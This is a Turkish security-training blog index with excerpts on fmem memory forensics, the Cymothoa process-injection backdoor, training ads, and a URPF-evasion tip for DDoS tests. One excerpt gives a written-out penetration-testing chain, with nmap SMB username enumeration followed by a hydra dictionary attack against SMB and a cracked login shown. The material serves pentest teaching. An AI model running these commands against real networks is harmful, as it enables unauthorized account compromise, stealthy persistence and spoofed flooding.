Bilgi Güvenliği AKADEMİSİ Blog

Fmem, linux sistemlerde RAM imajını almak için kullanılan bir forensic aracıdır.
Bir kernel modülü olarak çalışır.Sisteme sürü olarak yüklenir ve /dev/fmem dizininde bulunur.Tıpkı /dev/mem gibidir fakat bir limit yoktur (1MB/1GB dağıtıma bağlı olarak)

Kurulumu
wget http://hysteria.sk/~niekt0/foriana/fmem_current.tgz

tar zxvf fmem_current.tgz

cd fmem_1.6-0

# make
rm -f *.o *.ko *.mod.c Module.symvers Module.markers modules.order \.*.o.cmd \.*.ko.cmd \.*.o.d
rm -rf \.tmp_versions
make -C /lib/modules/`uname -r`/build SUBDIRS=`pwd` modules
make[1]: Entering directory `/usr/src/linux-headers-2.6.38-11-generic’
CC [M] /root/fmem_1.6-0/lkm.o
LD [M] /root/fmem_1.6-0/fmem.o
Building modules, stage 2.
MODPOST 1 modules
CC /root/fmem_1.6-0/fmem.mod.o
LD [M] /root/fmem_1.6-0/fmem.ko
make[1]: Leaving directory `/usr/src/linux-headers-2.6.38-11-generic’ devamını oku…

• Uygulamalı Ağ Güvenliği Eğitimi (Ankara-İstanbul)

Eğitim Tarihleri:
Ankara: 15-17 Şubat 2012
İstanbul:3,4,10 Mart 2012 (Hafta sonu programı)
Eğitim içeriği ve detaylar için : http://www.bga.com.tr/uygulamali-ag-guvenligi-egitimi-ankaraistanbul/

• Ağ ve Güvenlik Yöneticileri için Linux Eğitimi (Ankara-İstanbul)

Eğitim Tarihleri:
Ankara:10-12 Şubat 2012
İstanbul: 6-8 Mart 2012
Eğitim içeriği ve detaylar için : http://www.bga.com.tr/ag-ve-guvenlik-yoneticileri-icin-linux-egitimi-ankaraistanbul/

• Pfsense Güvenlik Duvarı Eğitimi (Ankara-İstanbul)

Eğitim Tarihleri:
Ankara: 15-17 Şubat 2012
İstanbul:27-29 Ocak 2012
Eğitim içeriği ve detaylar için: http://www.bga.com.tr/pfsense-guvenlik-duvari-egitimi-istanbul/

Pentest çalışmalarında, hedef sisteme erişim elde edildikden sonra sistemde kalıcı hale gelmek için arka kapılar oluşturulur.Bu konuda geliştirilen tekniklerden biri, çalışan bir process’e kod enjekte etmekdir.

Bu yöntemle, process’in dosya sistemindeki binary’sine herhangi bir zarar verilmediği için süreç RAM’de devam eder. Dolayısıyla, kendini diske yazan backdoor’lara göre tespit edilmesi daha da güçtür. Bir başka yazıda, analiz teknikleri yer alacaktır.

Cymothoa, çalışan bir process’e kod enjekte eden casus bir yazılımdır.Hali hazırda kendi üzerinde bulunan shellcode’ları enjekte ederek saldırgana uzakdan yönetim ve sistemde görünmez olma imkanı sağlar.

devamını oku…

Sızma testleri sırasında karşılaşılan durumlardan bir taneside belirli portlardan hizmet vermekte olan ip adreslerinin tespit edilmesidir. Örneğin web uygulamaları güvenlik testleri düşünüldüğünde 80/tcp ve 443/tcp portlarından hizmet vermekte olan ip adreslerinin belirlenme işlemi gerekli olabilmektedir.

Linux komutu satırı veya herhangi bir betik dili (python, ruby ve ya perl) özellikle sızma testlerinde adımları otomatize ederek iş hızını artırmaktadır.

192.168.1.0/24 ağı için bu işlem aşağıdaki şekilde linux komut satırından gerçekleştirilebilmektedir.

# nmap -n -PN -sT -p 80,443 192.168.1.1-254 –open | grep “report” | cut -d ” ” -f5 192.168.1.2 192.168.1.4 192.168.1.31 192.168.1.37

İç ağ testlerinde gerçekleştilen testlerden bir tanesi de ağda ilgili kullanıcı isimlerinin belirlenmesi olmaktadır. Bu işlem Nmap ile gerçekleştirilebilmektedir. 192.168.1.0 ağı için bu adımın gerçekleştirilmesi aşağıdaki şekilde olmaktadır.

Öncelikle aktif ip adreslerinin tespit edilmesi gerekmektedi, bunun için;

# nmap -p139,445 -n 192.168.1.1-254 --open | grep  -B3 "open" | grep -E 
"[0-9]+\.[0-9]+\.[0-9]+\." | awk '{print $5}' > ipler.txt

# nmap -p139,445 -n 192.168.1.1-254 --script=smb-enum-users
-iL ipler.txt > nmap-users.txt

Bu işlemlerin ardından dosya içerisinden kullanıcı isimleri  temin edilmelidir.

# cat nmap-users.txt |grep -v \\"$" | grep -v Tmpl |grep RID |cut -d
"\\" -f2 |cut -d"(" -f1 |sed 's/.$//'|sed -e 's/\(.* \)/\L\1/' " sort -rn | uniq > usernames.txt

Görüldüğü gibi kullanıcı isimleri ve aktif olan ip adresleri tespit edilmektedir. Bundan sonraki adım sözlük saldırısı ile bu kullanıcıların parola bilgilerinin elde edilmesi olacaktır. Bunun için hydra veya alternatif yazılımlar kullanılabilir. Hydra ile bu işlem aşağıdaki şekilde gerçekleştirilmektedir.

# hydra -M ipler.txt smbnt -s445 -L usernames.txt -P
passwd_file.txt -t1 -e n -m D > sonuc.txt

passwd_file.txt dosyası sözlük saldırısı için kullanılacak olan sözlüğü belirtmektedir. sonuc.txt dosyası içerisinden başarılı olan denemeler aşağıdaki gibi görülmektedir.

# cat sonuc.txt  | grep "\[smb\]" | awk '{print $3,$5,$7}'

192.168.1.37 ahmet.mehmet test37

Görüldüğü gibi başarılı olarak sonuçlanan kullanıcı adı/parola bilgisi yukarıdaki gibi olmaktadır.

Ömer ALBAYRAK

22 Aralık 2011 tarihinde Bilgi Güvenliği AKADEMİSİ ve ODTÜ işbirliğiyle gerçekleştirilen Siber Güvenlik Konferansı’na ait sunum dosyalarına aşağıdaki adreslerden erişebilirsiniz.

• Dış Kaynaklı Uygulamaların Güvenliği
• DDoS Engellemede Yüksek Başarı için Yönlendirmeler
• Kritik Bilgi Altyapıları ve Siber Güvenlik
• Siber Terör, 4. Nesil Savaşlar, Dolaylı Tutum ve Siber Dünyada Algı Yönetimi Faaliyetleri
• Endüstriyel Kaos
• Büyük Ölçekli Yapılarda Merkezi Log Yönetimi
• Siber Silah Endüstrisi
• VOIP Hacking & SIP Security
• Siber Tehdit Analizi

Etkinlikte çekilen fotoğraflar.

Bilgi Güvenliği AKADEMİSİ tarafından 200 farklı firmanın katılımıyla gerçekleştirilen “2011 Yılı Siber Tehditler Araştırması Anketi” sonuçlanmıştır. Ankete katılan tüm firmalara teşekkür ederiz.

Sonuçlara göre Kötücül yazılım bulaşması problemi listenin başını çekmekte ve yine buna bağlı bir madde olan DDoS Saldırıları ikinci sırada yer almaktadır.

İç çalışan tehditi ve veri sızdırma problemi de 2011 yılında artış gösteren anket maddelerinden biri olarak göze çarpmaktadır.

devamını oku…

URPF(Unicast Reverse Path Forwarding) ağ ve güvenlik cihazlarında IP spoofing’le mücadele etmek için kullanılan bir özelliktir.

Basitce URPF paketin kaynak ip adresinin yonlendirme tablosu ile karsilastirilmasi sonucu paketin uygun arabirimden gelip gelmediginin kontrol eder. URPF, internetten gelecek paketler için değil, güvenlik/network cihazı tarafından korunan sistemler için geçerlidir.

DDoS testleri gerçekleştirilirken genellikle test yapılan ağın çıkışındaki bir ağ/güvenlik cihazı üretilen sahte ip paketlerini URPF’den (ya da benzeri bir özellikten) dolayı engelliyor olabilir. Bu gibi durumlarda DDoS testlerinde üretilen paketler internete çıkamayacağı için hedef sisteme etkisi olmayacaktır. Bu gibi ortamlarda gönderilecek paketler kullanılan sistemle aynı subnetten üretilirse (mesela DDoS testi icin kullanılan sistemin ip adresi 192.168.1.3/24 olsun, burada 192.168.1.0/24 subnetinden rastgele ip kullanılabilir) URPF’e takılmadan hedef sisteme erişecektir. devamını oku…

BGA(Bilgi Güvenliği AKADEMİSİ) 2012 yılı ilk yarı eğitim takvimimiz netleşmiştir. Detay bilgi edinmek isteyenler http://www.bga.com.tr/bilgi-guvenligi-akademisi-2012-yili-egitim-takvimi/ adresini ziyaret edebilir. Eğitim takviminde özel sınıf eğitimlere öncelik verdiğimiz için bazı eğitimler şimdiden kapanmış durumdadır.

SecureCRT, yaygın kullanıma sahip  kolay kullanımlı uzaktan erişim, yönetim, dosya transferi ve  tünelleme imkanı veren ticari bir yazılımdır. Özellikle SSH sunuculara yapılan bağlantılarda tablı bir yapı sunması ve isteğe göre hedef sistemlerin parolalarını “şifreli” bir şekilde disk üzerinde barındırarak her bağlantıda parolayı tekrar sormaması UNIX/Linux adminlerin sık tercih ettiği özelliklerdendir.

 SecureCRT’e Kaydedilmiş Ama Hatırlanamayan Parolaların Bulunması devamını oku…